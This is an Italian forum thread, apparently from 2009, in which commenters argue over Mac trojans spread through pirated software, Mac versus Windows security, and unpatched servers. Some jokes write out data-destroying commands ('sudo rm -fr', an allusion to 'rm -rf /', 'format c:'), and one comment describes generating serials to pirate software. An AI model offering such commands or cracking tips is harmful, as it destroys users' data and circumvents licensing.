        etc
        etc...
        Hai ragione a dire che un virus è diverso da un trojan, però una volta che prendi il trojan non è mica detto che sia facile rimuoverlo. Che non si replichi è un discorso, che sia una gran rottura di maroni un'altra.
        • MeX scrive:
          Re: Per i soliti Mac....
          leggiti le varie info al riguardo, per quanto riguardo QUESTI trojans su MAC l'unica operazione da fare é eliminare il file del trojan e KILLARE il proXXXXX, come dicevo siamo ben lontani da un'infezione virale od un worm...
          • pippo scrive:
            Re: Per i soliti Mac....

            leggiti le varie info al riguardo, per quanto
            riguardo QUESTI trojans su MAC l'unica operazione
            da fare é eliminare il file del trojan e KILLARE
            il proXXXXX, come dicevo siamo ben lontani da
            un'infezione virale od un
            worm...Per ORA...Mi ricordo quante volte avete detto: noi non abbiamo questi problemi!Buon risveglio :D
          • MeX scrive:
            Re: Per i soliti Mac....
            guarda che non é mica la prima volta che capita una cosa del genere! ce ne sono anche di piú vecchi di trojan... ma appunto non si sono mai diffusi piú di tanto... perhcé appunto con Windows tu prendi un virus e infetti tutti i tuoi amici in rubrica o gli amici a cui passi la chiavetta USB (da qui la definizione di VIRUS) mentre questi sono trojan che una diffusione limitatissima, anche perché chi si "infetta" non infetta nessun altro...
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            guarda che non é mica la prima volta che capita
            una cosa del genere! ce ne sono anche di piú
            vecchi di trojan... ma appunto non si sono mai
            diffusi piú di tanto... perhcé appunto conDiffusi dove? Fino a ieri era piu' probabile che ti cascasse in testa lo shuttle piuttosto che trovare un mac collegato in rete? Oggi e' piu' probabile che ti caschi in testa qualche satellite russo ma perche' un virus si diffonda ci devono essere ospite e vettore.
          • MeX scrive:
            Re: Per i soliti Mac....
            non sono cosí ferrato sui dati ma mi sembra che la diffusione di MacOS sia sempre stata superiore a quella che é perdire la diffusione di Linux ora... si parlava anche allora di MILIONI di macchine :)
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            non sono cosí ferrato sui dati ma mi sembra che
            la diffusione di MacOS sia sempre stata superiore
            a quella che é perdire la diffusione di Linux
            ora... si parlava anche allora di MILIONI di
            macchine
            :)Certo che saranno milioni di macchine, ci sono circa 900 milioni di pc installati nel mondo quindi anche con lo 0,8% di linux parliamo di 8 milioni di macchine. Il problema e' che facendo una scansione della rete a casaccio ho meno di una possibilita' su 100 di trovare una macchina linux, meno di 10 su cento di trovare un mac e il restante 90 di trovare windows... per quale dei tre si potra' diffondere piu' rapidamente un virus? Questo solo su mere considerazioni statistiche, all'atto pratico il bersaglio preferito di un virus sono le reti aziendali di centinaia di pc, tutti con la stessa versione, tutti con le stesse vulnerabilita', tutti raggiungibili con facilita' perche' dietro lo stesso firewall. Quante reti aziendali con centinaia di mac ci saranno in giro? Quella della apple probabilmente...
          • MeX scrive:
            Re: Per i soliti Mac....

            Il problema e' che facendo una scansione della
            rete a casaccio ho meno di una possibilita' su
            100 di trovare una macchina linux, meno di 10 su
            cento di trovare un mac e il restante 90 di
            trovare windows... per quale dei tre si potra'
            diffondere piu' rapidamente un virus?piú che il problema di quante macchine ci siano devi considerare quanti virus ci sono per i sistemi *nix... 0.Se questo trojan fosse stato un worm avrebbe infestato in tempo 0 migliaia e migliaia di mac! perché la maggior parte sono privi di protezioni antivirus... basterebbe che il virus si inviasse ai contatti in rubrica il cui indirizzo é @me.com o @mac.com sei sicuro che sono mac users...
          • pippo scrive:
            Re: Per i soliti Mac....

            Se questo trojan fosse stato un worm avrebbe
            infestato in tempo 0 migliaia e migliaia di mac!
            perché la maggior parte sono privi di protezioni
            antivirus... basterebbe che il virus si inviasse
            ai contatti in rubrica il cui indirizzo é @me.com
            o @mac.com sei sicuro che sono mac
            users...abbi fede arriveranno... O)
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            Mah ?! Sono anni che aspetti , proprio non vuoi mollare.Devi fartene una ragione
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MonsterS4r
            Mah ?! Sono anni che aspetti , proprio non vuoi
            mollare.
            Devi fartene una ragioneGuarda che ne sono arrivati parecchi negli ultimi anni, fortunamente essendoci pochissimi macachi al mondo in grado di accendere un computer, non se ne e' accorto nessuno.Una ricerchina in rete con macosx remote exploit illuminera' le menti.
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            Infatti ricordo le numerose pandemie sui MAC......, e poi basta con sta' storia della diffusione , cambiate disco.Dai mandami un virus per MAC sulla mia mailbox che appena arrivo a casa lo eseguo. Aspetto ansioso
          • pippo scrive:
            Re: Per i soliti Mac....

            Dai mandami un virus per MAC sulla mia mailbox
            che appena arrivo a casa lo eseguo. Aspetto
            ansiosoArriveranno, arriveranno... O)
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            - Scritto da: pippo

            Dai mandami un virus per MAC sulla mia mailbox

            che appena arrivo a casa lo eseguo. Aspetto

            ansioso
            Arriveranno, arriveranno...
            O)...e io continuo ad aspettare ansioso , trallala trallala
          • alexjenn scrive:
            Re: Per i soliti Mac....
            - Scritto da: nome e cognome
            - Scritto da: MeX

            non sono cosí ferrato sui dati ma mi sembra che

            la diffusione di MacOS sia sempre stata
            superiore

            a quella che é perdire la diffusione di Linux

            ora... si parlava anche allora di MILIONI di

            macchine

            :)

            Certo che saranno milioni di macchine, ci sono
            circa 900 milioni di pc installati nel mondo
            quindi anche con lo 0,8% di linux parliamo di 8
            milioni di macchine.

            Il problema e' che facendo una scansione della
            rete a casaccio ho meno di una possibilita' su
            100 di trovare una macchina linux, meno di 10 su
            cento di trovare un mac e il restante 90 di
            trovare windows... per quale dei tre si potra'
            diffondere piu' rapidamente un virus?

            Per tutti. La possibilità di venire infettato da un virus non è correlato dal fatto che tuoi simili siano esposti, ma dalla mera esposizione tua.Non è indicativo che il 10% dei computer sia Mac perché vengano infettati, non è superando una certa percentuale di presenza macchine che si corre il rischio maggiore ma, in presenza di virus, basta essere esposti, collegati, e per ciò basta essere uno.Io ho un Mac, non TUTTI i Mac, quindi il rischio di infezione che corro è uguale a colui che ha un PC con Windows e a colui che ha un PC con Linux.Inoltre, nella tua considerazione, tipica di chi detrae Apple, parlate di diffusione come se i virus fossero uguali per tutti i sistemi operativi, quando sai che non è così.Un virus per Windows non attacca Mac e non attacca Linux, così come un eventuale virus per Mac non attacca gli altri due e idem per Linux.Allora, davanti a questo fatto, a cosa valgono i dati di diffusione dei computer sul mercato?Che esistano 2 miliardi di PC con Windows, 200 milioni di Mac e 300 milioni di Linux, un virus che attacca Windows non se ne cura degli altri 500 milioni di computer, cioè si diffonde sul 100% delle macchine Windows; d'altro canto, un eventuale virus per Mac non se ne fa niente degli altri 2,3 miliardi di computer, ma vede il 100% delle macchine Mac; idem per Linux.Allora, quale indice può rivelare la velocità di diffusione di un virus? Semplice: il livello di protezione (i Mac con antivirus sono 1 su 1 milione, quindi più propensi) e il collegamento a reti (e questo è un fattore puramente individuale).In teoria, quindi, i PC con Windows dovrebbero essere quelli meno propensi, data la quantità di software antivirus installato, mentre i Mac sono quelli più vulnerabili, poiché nessuno installa antivirus nel proprio Mac.Dati reali, però, individuano che i PC Windows siano i più infettati (almeno i sistemi Windows, come i cellulari con WIndows Mobile), mentre gli altri nisba.Allora, sei ancora dell'avviso che tutto dipenda solo ed esclusivamente dalla diffusione, oppure ci troviamo davanti a un caso in cui un sistema come Windows è fatto davvero male?-----------------------------------------------------------Modificato dall' autore il 29 gennaio 2009 13.04-----------------------------------------------------------
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: alexjenn
            - Scritto da: nome e cognome

            - Scritto da: MeX


            non sono cosí ferrato sui dati ma mi sembra
            che


            la diffusione di MacOS sia sempre stata

            superiore


            a quella che é perdire la diffusione di Linux


            ora... si parlava anche allora di MILIONI di


            macchine


            :)



            Certo che saranno milioni di macchine, ci sono

            circa 900 milioni di pc installati nel mondo

            quindi anche con lo 0,8% di linux parliamo di 8

            milioni di macchine.



            Il problema e' che facendo una scansione della

            rete a casaccio ho meno di una possibilita' su

            100 di trovare una macchina linux, meno di 10 su

            cento di trovare un mac e il restante 90 di

            trovare windows... per quale dei tre si potra'

            diffondere piu' rapidamente un virus?






            Per tutti. La possibilità di venire infettato da
            un virus non è correlato dal fatto che tuoi
            simili siano esposti, ma dalla mera esposizione
            tua.

            Non è indicativo che il 10% dei computer sia Mac
            perché vengano infettati, non è superando una
            certa percentuale di presenza macchine che si
            corre il rischio maggiore ma, in presenza di
            virus, basta essere esposti, collegati, e per ciò
            basta essere
            uno.

            Io ho un Mac, non TUTTI i Mac, quindi il
            rischio di infezione che corro è uguale a colui
            che ha un PC con Windows e a colui che ha
            un PC con
            Linux.



            Inoltre, nella tua considerazione, tipica di chi
            detrae Apple, parlate di diffusione come se i
            virus fossero uguali per tutti i sistemi
            operativi, quando sai che non è
            così.

            Un virus per Windows non attacca Mac e non
            attacca Linux, così come un eventuale virus per
            Mac non attacca gli altri due e idem per
            Linux.

            Allora, davanti a questo fatto, a cosa valgono i
            dati di diffusione dei computer sul
            mercato?

            Che esistano 2 miliardi di PC con Windows, 200
            milioni di Mac e 300 milioni di Linux, un virus
            che attacca Windows non se ne cura degli altri
            500 milioni di computer, cioè si diffonde sul
            100% delle macchine Windows; d'altro canto, un
            eventuale virus per Mac non se ne fa niente degli
            altri 2,3 miliardi di computer, ma vede il 100%
            delle macchine Mac; idem per
            Linux.

            Allora, quale indice può rivelare la velocità di
            diffusione di un virus? Semplice: il livello di
            protezione (i Mac con antivirus sono 1 su 1
            milione, quindi più propensi) e il collegamento a
            reti (e questo è un fattore puramente
            individuale).

            In teoria, quindi, i PC con Windows dovrebbero
            essere quelli meno propensi, data la quantità di
            software antivirus installato, mentre i Mac sono
            quelli più vulnerabili, poiché nessuno installa
            antivirus nel proprio
            Mac.

            Dati reali, però, individuano che i PC Windows
            siano i più infettati (almeno i sistemi Windows,
            come i cellulari con WIndows Mobile), mentre gli
            altri
            nisba.

            Allora, sei ancora dell'avviso che tutto dipenda
            solo ed esclusivamente dalla diffusione, oppure
            ci troviamo davanti a un caso in cui un sistema
            come Windows è fatto davvero
            male?Che Windows sul profilo della sicurezza sia molto perfettibile è fuori di dubbio, ma affermare che la quota di un SO sia ininfluente a determinare la diffusione di virus è una XXXXXXXXX colossale!Chi scrive virus lo fa per colpire il maggior numero di macchine possibili, ergo tenderà a farlo per il SO più diffuso ossia Windows!Il fatto che i Mac veleggino verso una quota del 10% evidentemente sta attirando le attenzioni dei virus writers ergo è lecito aspettarsi un aumento dei virus per tale sistema, che poi Mac OSx e Linux stiano messi molto meglio di windows quanto a sicurezza e che la cosa unita alla loro minor penetrazione sul mercato li renda meno appetibili è un'altro discorso!Quindi è bene che anche un utente Mac stia ben attento a quello che fa e che in futuro programmi magari l'uso di un buon firewall e di un antivirus!
          • alexjenn scrive:
            Re: Per i soliti Mac....
            - Scritto da: Enjoy with Us
            Che Windows sul profilo della sicurezza sia molto
            perfettibile è fuori di dubbio, ma affermare che
            la quota di un SO sia ininfluente a determinare
            la diffusione di virus è una XXXXXXXXX
            colossale!
            Chi scrive virus lo fa per colpire il maggior
            numero di macchine possibili, ergo tenderà a
            farlo per il SO più diffuso ossia
            Windows!Ovvero, a tuo avviso, chi lo fa lo fa solo per diletto, per passatempo.Secondo il tuo ragionamento, allora colpire Mac OS X non farebbe saltare sugli spalti della gloria?
            Il fatto che i Mac veleggino verso una quota del
            10% evidentemente sta attirando le attenzioni dei
            virus writers ergo è lecito aspettarsi un aumento
            dei virus per tale sistema,Ma scusa, quanto tempo ci vuole, allora, per scrivere un virus?A tuo dire, un virus writer ci impiegherebbe anni per farlo?Perché, sai, è un bel pezzo che Mac OS X si trova sul mercato (dal 2001).
            che poi Mac OSx e
            Linux stiano messi molto meglio di windows quanto
            a sicurezza e che la cosa unita alla loro minor
            penetrazione sul mercato li renda meno appetibili
            è un'altro
            discorso!Meno appetibili? Come sarebbe meno appetibile un sistema come Mac OS X che non viene protetto da nessun antivirus?
            Quindi è bene che anche un utente Mac stia ben
            attento a quello che fa e che in futuro programmi
            magari l'uso di un buon firewall e di un
            antivirus!Sì, sui firewall sono d'accordo, e i tre che monta OS X mi sembrano sufficienti.A quanto a virus, certo, bisogna stare sempre in guardia, ma Mac OS X (e questo non ti entra) ha una struttura ben diversa da Windows.Costa tanto capirlo?
          • pippo scrive:
            Re: Per i soliti Mac....

            guarda che non é mica la prima volta che capita
            una cosa del genere!Oh, ma davvero? :D
            vecchi di trojan... ma appunto non si sono mai
            diffusi piú di tanto... perhcé appunto con
            Windows tu prendi un virus e infetti tutti i tuoi
            amici in rubrica o gli amici a cui passi la
            chiavetta USB (da qui la definizione di VIRUS)P.S. i primi virus si passavano via FLOPPY o bbs, siete arrivati tardi anche qui O) ma ci siete arrivati :@
          • MeX scrive:
            Re: Per i soliti Mac....
            - Scritto da: pippo

            guarda che non é mica la prima volta che capita

            una cosa del genere!

            Oh, ma davvero? :Dgiá! non si finisce mai di imparare eh? ;)

            vecchi di trojan... ma appunto non si sono mai

            diffusi piú di tanto... perhcé appunto con

            Windows tu prendi un virus e infetti tutti i
            tuoi

            amici in rubrica o gli amici a cui passi la

            chiavetta USB (da qui la definizione di VIRUS)
            P.S. i primi virus si passavano via FLOPPY o bbs,
            siete arrivati tardi anche qui O) ma ci siete
            arrivati
            :@ehm no appunto non ci siamo ancora arrivati... a meno che non ti scarichi software piratato (e per adesso si parla solo di iWork e Photoshop) non c'é verso di ritrovarsi il trojan sul proprio mac... siamo ancora lontani dai virus che si propagano da soli su windows anche tramite messenger ;)
          • pippo scrive:
            Re: Per i soliti Mac....

            ehm no appunto non ci siamo ancora arrivati... a
            meno che non ti scarichi software piratato (e per
            adesso si parla solo di iWork e Photoshop) non
            c'é verso di ritrovarsi il trojan sul proprio
            mac... siamo ancora lontani dai virus che si
            propagano da soli su windows anche tramite
            messenger
            ;)Pensa alle risate quando architetti e musicisti dovranno fare cose di questo tipo:sudo rm -frkillall -9 BruttoVirusCattivoSENZA TOCCARE IL MOUSE!!!(rotfl)(rotfl)(rotfl)
          • Steve Austin scrive:
            Re: Per i soliti Mac....

            Pensa alle risate quando architetti e musicisti
            dovranno fare cose di questo
            tipo:
            sudo rm -fr
            killall -9 BruttoVirusCattivo
            SENZA TOCCARE IL MOUSE!!!
            (rotfl)(rotfl)(rotfl)Non lo faranno, porteranno tutto in assistenza.
          • MeX scrive:
            Re: Per i soliti Mac....
            se sanno installare un client torrent, e crakkare photoshop son capaci anche di eseguire un banale comando... o trasinare il file nel cestino, cliccare su spotlight digitare "mon" dare invio (e viene aperto il system monitor) e con un click killare il proXXXXX, se proprio vogliono usare il mouse ;)
          • Steve Austin scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            se sanno installare un client torrent, e crakkare
            photoshop son capaci anche di eseguire un banale
            comando... o trasinare il file nel cestino,
            cliccare su spotlight digitare "mon" dare invio
            (e viene aperto il system monitor) e con un click
            killare il proXXXXX, se proprio vogliono usare il
            mouse
            ;)nooooooo mai più! mediamente l'utente mac sa fare solo avanti ok avanti accetto installa
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            - Scritto da: Steve Austin
            - Scritto da: MeX

            se sanno installare un client torrent, e
            crakkare

            photoshop son capaci anche di eseguire un banale

            comando... o trasinare il file nel cestino,

            cliccare su spotlight digitare "mon" dare invio

            (e viene aperto il system monitor) e con un
            click

            killare il proXXXXX, se proprio vogliono usare
            il

            mouse

            ;)

            nooooooo mai più! mediamente l'utente mac sa fare
            solo avanti ok avanti accetto
            installaSe ti senti bravo con un "format c:" .....
          • MeX scrive:
            Re: Per i soliti Mac....

            nooooooo mai più! mediamente l'utente mac sa fare
            solo avanti ok avanti accetto
            installa1. avanti2. ok3. avanti4. accetto5. installa5 passaggi per installare un software?Di solito l'utente mac tracina un icona colorata dentro la cartella applications e ha fatto...Per le app piú gross in effetti deve:1. fare doppio click2. inserire la password3. aspettare che tutto finisca ;)
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            Per le app piú gross in effetti deve:
            1. fare doppio click
            2. inserire la password
            3. aspettare che tutto finisca ;)4. pregare
          • MeX scrive:
            Re: Per i soliti Mac....

            4. pregareuhm... no quello é sempre un retaggio di Windows...il Plug and Pray[img]http://members.ozemail.com.au/~lbrash/msjokes/BILL-GATES-bsod.jpg[/img]
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX

            4. pregare

            uhm... no quello é sempre un retaggio di
            Windows...
            il Plug and Pray

            [img]http://members.ozemail.com.au/~lbrash/msjokesPurtroppo nel caso del mac non infili niente, te l'hanno gia infilato quando hai pagato ... rimane solo il pray.
          • MeX scrive:
            Re: Per i soliti Mac....
            eh si bella fregatura non avere BSOD ;)
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            eh si bella fregatura non avere BSOD ;)Bisogna ammettere che il nero e' molto fashion.
          • MeX scrive:
            Re: Per i soliti Mac....
            beh abbiamo avuto anche noi un quasi BSOD... peró non era proprio blu ma azzurrina...
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX

            nooooooo mai più! mediamente l'utente mac sa
            fare

            solo avanti ok avanti accetto

            installa

            1. avanti
            2. ok
            3. avanti
            4. accetto
            5. installa

            5 passaggi per installare un software?
            Di solito l'utente mac tracina un icona colorata
            dentro la cartella applications e ha
            fatto...

            Per le app piú gross in effetti deve:
            1. fare doppio click
            2. inserire la password
            3. aspettare che tutto finisca ;) e appunto beccarsi il virus o rassegnarsi a comprare solo software originale..... costoso sto Mac!
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            Ah ecco perché odi i MAC, perché puoi RUBARE ben poco.Adesso si spiega tutto questo astioCOMPLIMENTS
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: MonsterS4r
            Ah ecco perché odi i MAC, perché puoi RUBARE ben
            poco.

            Adesso si spiega tutto questo astio

            COMPLIMENTSMa se ti stanno dicendo che il XXXXXn in questione si diffonde perchè viene usato come crack di un noto software per mac?Non sono certo Io quello che si compra un Mac per metterci poi programmi taroccati!
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            - Scritto da: Enjoy with Us
            - Scritto da: MonsterS4r

            Ah ecco perché odi i MAC, perché puoi RUBARE ben

            poco.



            Adesso si spiega tutto questo astio



            COMPLIMENTS


            Ma se ti stanno dicendo che il XXXXXn in
            questione si diffonde perchè viene usato come
            crack di un noto software per
            mac?
            Non sono certo Io quello che si compra un Mac per
            metterci poi programmi
            taroccati!Oh ma sono io o tu che dice : "comprare solo software originale..... costoso sto Mac!"Si deduce che tu non compri software originale; quanto hai speso per Office ?? :-)
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: MonsterS4r
            - Scritto da: Enjoy with Us

            - Scritto da: MonsterS4r


            Ah ecco perché odi i MAC, perché puoi RUBARE
            ben


            poco.





            Adesso si spiega tutto questo astio





            COMPLIMENTS





            Ma se ti stanno dicendo che il XXXXXn in

            questione si diffonde perchè viene usato come

            crack di un noto software per

            mac?

            Non sono certo Io quello che si compra un Mac
            per

            metterci poi programmi

            taroccati!

            Oh ma sono io o tu che dice : "comprare solo
            software originale..... costoso sto
            Mac!"
            Si deduce che tu non compri software originale;
            quanto hai speso per Office ??
            :-)Zero, dato che uso open Office!
          • MeX scrive:
            Re: Per i soliti Mac....
            bah iWork trial+seriale e sei a posto...iLife non ha nessun seriale... quindi non corri rischi... stessa cosa per tutto il software Apple...Per i software di terze parti... su mac non esiste il crack... si usano sempre i seriali... al massimo puoi generare i seriali o i file delle licenze su un windows virtualizzato :D
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            Pensa alle risate quando architetti e musicisti
            dovranno fare cose di questo
            tipo:
            sudo rm -fr
            killall -9 BruttoVirusCattivo
            SENZA TOCCARE IL MOUSE!!!
            (rotfl)(rotfl)(rotfl)Lol... si profilano tempi d'oro per apple care. sudo rm -rf e' solo uno / lontano dal divertimento.
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            diffusi piú di tanto... perhcé appunto con
            Windows tu prendi un virus e infetti tutti i tuoi
            amici in rubrica o gli amici a cui passi la
            chiavetta USB (da qui la definizione di VIRUS)No, troppo poco preciso come discorso.Succede quello che dici se:1 - Hai preso il PC ieri2 - Te lo hanno venduto senza AV3 - Chiudi le notifiche di agg. AV senza leggere4 - Non sai neanche per sentito dire cosa è un Virus5 - Vai su siti periocolosi e devi clickare OK a tutti i costi anche se non ti interessa6 - Abbocchi alle email (il 99% sono palesemnte ridicole)7 - nessuno ti ha insegnato ad usare il PC non da AdminSono anni che non becco un virus, seguendo un terzo di questi punti.
          • Lemon scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            leggiti le varie info al riguardo, per quanto
            riguardo QUESTI trojans su MAC l'unica operazione
            da fare é eliminare il file del trojan e KILLARE
            il proXXXXX, come dicevo siamo ben lontani da
            un'infezione virale od un
            worm...Ho capito, tu parlavi di QUESTO in particolare, io parlavo in generale.
          • MeX scrive:
            Re: Per i soliti Mac....
            si ma per adesso oltre a questi... e pochi altri di qualche anno fa... non ci sono altre casistiche
          • Lemon scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            si ma per adesso oltre a questi... e pochi altri
            di qualche anno fa... non ci sono altre
            casisticheInfatti. In realtà c'è questa teoria che serpeggia da una vita e cioè che finchè non ci sarà una gran diffusione di macchine mac o linux non ci sarà gente interessata a scrivere virus di larga diffusione come su windows. Io credo che è come discutere se è nato prima l'uovo o la gallina, non serve a nulla, sono sistemi che partono con delle basi più solide e se è vero o no che ci saranno virus anche per queste macchine lo vedremo solo quando sarà ora.Io invece ho paura per un'altra cosa, vado un pò off-topic ma visto che ci siamo... nella mia esperienza personale ho visto decine e decine di server linux non aggiornati, molti hanno paura di fare aggiornamenti (io per primo se non ho usato solo repository ufficiali per tutti i pacchetti installati), molti sistemisti partono dal concetto che un sistema che funziona non si tocca, e lasciano tutto lì per ANNI. Mi domando se qualcuno sfrutti questi bug su macchine mai aggiornate....
          • MeX scrive:
            Re: Per i soliti Mac....

            installati), molti sistemisti partono dal
            concetto che un sistema che funziona non si
            tocca, e lasciano tutto lì per ANNI. Mi domando
            se qualcuno sfrutti questi bug su macchine mai
            aggiornate....missá che conosci sistemisti un po' particolari... gli aggiornamenti di sicurezza non sono certo da ignorare!
          • pippo scrive:
            Re: Per i soliti Mac....


            installati), molti sistemisti partono dal

            concetto che un sistema che funziona non si

            tocca, e lasciano tutto lì per ANNI. Mi domando

            se qualcuno sfrutti questi bug su macchine mai

            aggiornate....

            missá che conosci sistemisti un po'
            particolari... gli aggiornamenti di sicurezza non
            sono certo da
            ignorare!Veramente sei tu, che ne conosci pochi di sistemisti.Prova a cercarti le "storie dalla sala macchine" giusto per farti un'idea...
          • MeX scrive:
            Re: Per i soliti Mac....

            Prova a cercarti le "storie dalla sala macchine"
            giusto per farti
            un'idea...giá... e magari il tuo punto di riferimento é il sistemista di camera café :D
          • pippo scrive:
            Re: Per i soliti Mac....

            giá... e magari il tuo punto di riferimento é il
            sistemista di camera café
            :DMi dispiace ma qui nelle caverne la tv non arriva :D
          • MeX scrive:
            Re: Per i soliti Mac....
            beh ma se sei su internet... ti bast vcast ;)
          • pippo scrive:
            Re: Per i soliti Mac....

            beh ma se sei su internet... ti bast vcast ;)No, è per via del telecomando, ha troppi tasti non riesco ad usarlo :$
          • Uello scrive:
            Re: Per i soliti Mac....
            Linkaci dov'è che davide bianchi dice che è meglio non fare gli AGGIORNAMENTI DI S-I-C-U-R-E-Z-Z-A , sono curioso- Scritto da: pippo


            installati), molti sistemisti partono dal


            concetto che un sistema che funziona non si


            tocca, e lasciano tutto lì per ANNI. Mi
            domando


            se qualcuno sfrutti questi bug su macchine mai


            aggiornate....



            missá che conosci sistemisti un po'

            particolari... gli aggiornamenti di sicurezza
            non

            sono certo da

            ignorare!
            Veramente sei tu, che ne conosci pochi di
            sistemisti.
            Prova a cercarti le "storie dalla sala macchine"
            giusto per farti
            un'idea...
          • Lemon scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX

            installati), molti sistemisti partono dal

            concetto che un sistema che funziona non si

            tocca, e lasciano tutto lì per ANNI. Mi domando

            se qualcuno sfrutti questi bug su macchine mai

            aggiornate....

            missá che conosci sistemisti un po'
            particolari... gli aggiornamenti di sicurezza non
            sono certo da
            ignorare!Bhè, ti assicuro che mi sembrano più diffusi quelli che non aggiornano le macchine linux. Che non siano da trascurare è la teoria, che in realtà non vengano fatti è la pratica. Ti ripeto, forse è una abitudine di qualche anno fa, ma la paura che dopo un aggiornamento non funzionasse più niente (ed è sucXXXXX in più di qualche caso) era superiore al pericolo di attacchi esterni. Non lo dico per essere contro linux, assolutamente, è proprio quello che ho visto e vedo nelle realtà che frequento.
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            Divagazione sociologica.
            Teniamo presente l'italica mentalità dello
            scarica
            barile:
            se aggiorni per tenere alto il livello di
            sicurezza e si pianta tutto é colpa
            tua.
            se non aggiorni per non rischiare e ti pianta
            tutto un hacker hai sempre qualcuno a cui dare la
            colpa.Idiozie... il risultato e' lo stesso, credi che al CFO freghi qualcosa se il sistema e' piantato per un hacker o per la patch? Credi che conosca il significato della parola patch? Alla fine le patch si testano, punto. Costa e ci vuole tempo.
          • Steve Austin scrive:
            Re: Per i soliti Mac....
            - Scritto da: nome e cognome

            Divagazione sociologica.

            Teniamo presente l'italica mentalità dello

            scarica

            barile:

            se aggiorni per tenere alto il livello di

            sicurezza e si pianta tutto é colpa

            tua.

            se non aggiorni per non rischiare e ti pianta

            tutto un hacker hai sempre qualcuno a cui dare
            la

            colpa.

            Idiozie... il risultato e' lo stesso, credi che
            al CFO freghi qualcosa se il sistema e' piantato
            per un hacker o per la patch? Credi che conosca
            il significato della parola patch?

            Alla fine le patch si testano, punto. Costa e ci
            vuole
            tempo.Il sistemista dell'INPS o del comune di vattelapesca (se ne ha uno) fanno come sopra.
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            Il sistemista dell'INPS o del comune di
            vattelapesca (se ne ha uno) fanno come
            sopra.Eccapirai al sistemista dell'inps e ai suoi dirigenti che gli frega del fermo macchina... non lo possono licenziare, non perdono soldi e probabilmente il sistemista in questione e' figlio del sindaco ... io parlavo di aziende.
          • MeX scrive:
            Re: Per i soliti Mac....

            ... io parlavo di
            aziende.dove il "capo" ha il figlio come amministratore delegato e il cugino come sistemista?Oppure come sistemista ha un interinale Adecco a 900 al mese :)
          • nome e cognome scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX

            ... io parlavo di

            aziende.

            dove il "capo" ha il figlio come amministratore
            delegato e il cugino come
            sistemista?
            Oppure come sistemista ha un interinale Adecco a
            900 al mese
            :)si ma pensa che succede se il cugino sistemista fa perdere al "capo" un bel po' di soldi... mentre l'interinale adecco se ci tiene ai suoi 900 al mese e spera di essere assunto a TI spero testi le patch.
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            leggiti le varie info al riguardo, per quanto
            riguardo QUESTI trojans su MAC l'unica operazione
            da fare é eliminare il file del trojan e KILLARE
            il proXXXXX, come dicevo siamo ben lontani da
            un'infezione virale od un
            worm...LOL, il fatto che si rimuova facilmente non significa che non sia un infezione.il 99.9% dei trojan/spyware/virus su windows si tolgono facilmente con qualsiasi AV, la fortuna di OSX è che nessuno ha scritto il trojan con cattiveria ma più per un P-O-C.
          • MeX scrive:
            Re: Per i soliti Mac....

            LOL, il fatto che si rimuova facilmente non
            significa che non sia un
            infezione.invece si, perhcé per l'appunto il computer infettato non si re-infetta e non infetta altri computer
            il 99.9% dei trojan/spyware/virus su windows si
            tolgono facilmente con qualsiasi AV, la fortuna
            di OSX è che nessuno ha scritto il trojan con
            cattiveria ma più per un
            P-O-C.ah si... molto piú semplice scaricarsi un AV, installarlo, aggiornarlo e dedicare risorse del computer... anziché eliminare un file e killare un proXXXXX :D
          • pippo scrive:
            Re: Per i soliti Mac....


            LOL, il fatto che si rimuova facilmente non

            significa che non sia un

            infezione.

            invece si, perhcé per l'appunto il computer
            infettato non si re-infetta e non infetta altri
            computerIn questo caso...

            il 99.9% dei trojan/spyware/virus su windows si

            tolgono facilmente con qualsiasi AV, la fortuna

            di OSX è che nessuno ha scritto il trojan con

            cattiveria ma più per un

            P-O-C.

            ah si... molto piú semplice scaricarsi un AV,
            installarlo, aggiornarlo e dedicare risorse del
            computer... anziché eliminare un file e killare
            un proXXXXXL'AV non è oblbigatorio per cancellare un file :D
          • MeX scrive:
            Re: Per i soliti Mac....

            In questo caso...eh ma non ci sono altri casi... quindi...
            L'AV non è oblbigatorio per cancellare un file :Dma su win nel 90% dei casi un virus non lo debelli cancellando un file ;)
          • pippo scrive:
            Re: Per i soliti Mac....

            eh ma non ci sono altri casi... quindi...Attendi fiducioso, arriveranno O)
          • -ToM- scrive:
            Re: Per i soliti Mac....
            - Scritto da: MeX
            invece si, perhcé per l'appunto il computer
            infettato non si re-infetta e non infetta altri
            computeraaaaah con questi giri di parole.Non mi interessa se è una "forma virale", non deve essere per forza "contagioso" per essere infetti da un trojan/virus/worm ecc... perchè anche se è innocuo, sei stato contagiato.Certo se si deve stare a discutere sul significato ambiguo delle parole di uso clinico applicate all'informatica allora stiamo freschi...
            ah si... molto piú semplice scaricarsi un AV,
            installarlo, aggiornarlo e dedicare risorse del
            computer... anziché eliminare un file e killare
